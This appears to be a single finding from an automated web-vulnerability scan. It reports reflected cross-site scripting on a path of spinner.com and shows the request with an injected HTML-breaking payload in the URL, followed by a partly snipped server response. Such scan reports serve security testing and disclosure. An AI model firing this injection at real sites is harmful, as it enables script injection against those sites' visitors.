1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.spinner.com |
Path: | /category/mp3-of-the-day/ |
GET /category/mp3-of-the-day12e3a"><img%20src%3da Host: www.spinner.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 18:03:47 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999936 Connection: Keep-Alive Content-Type: text/html X-Pad: avoid browser bug Content-Length: 35812 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <link rel="canonical" href="http://www.spinner ...[SNIP]... |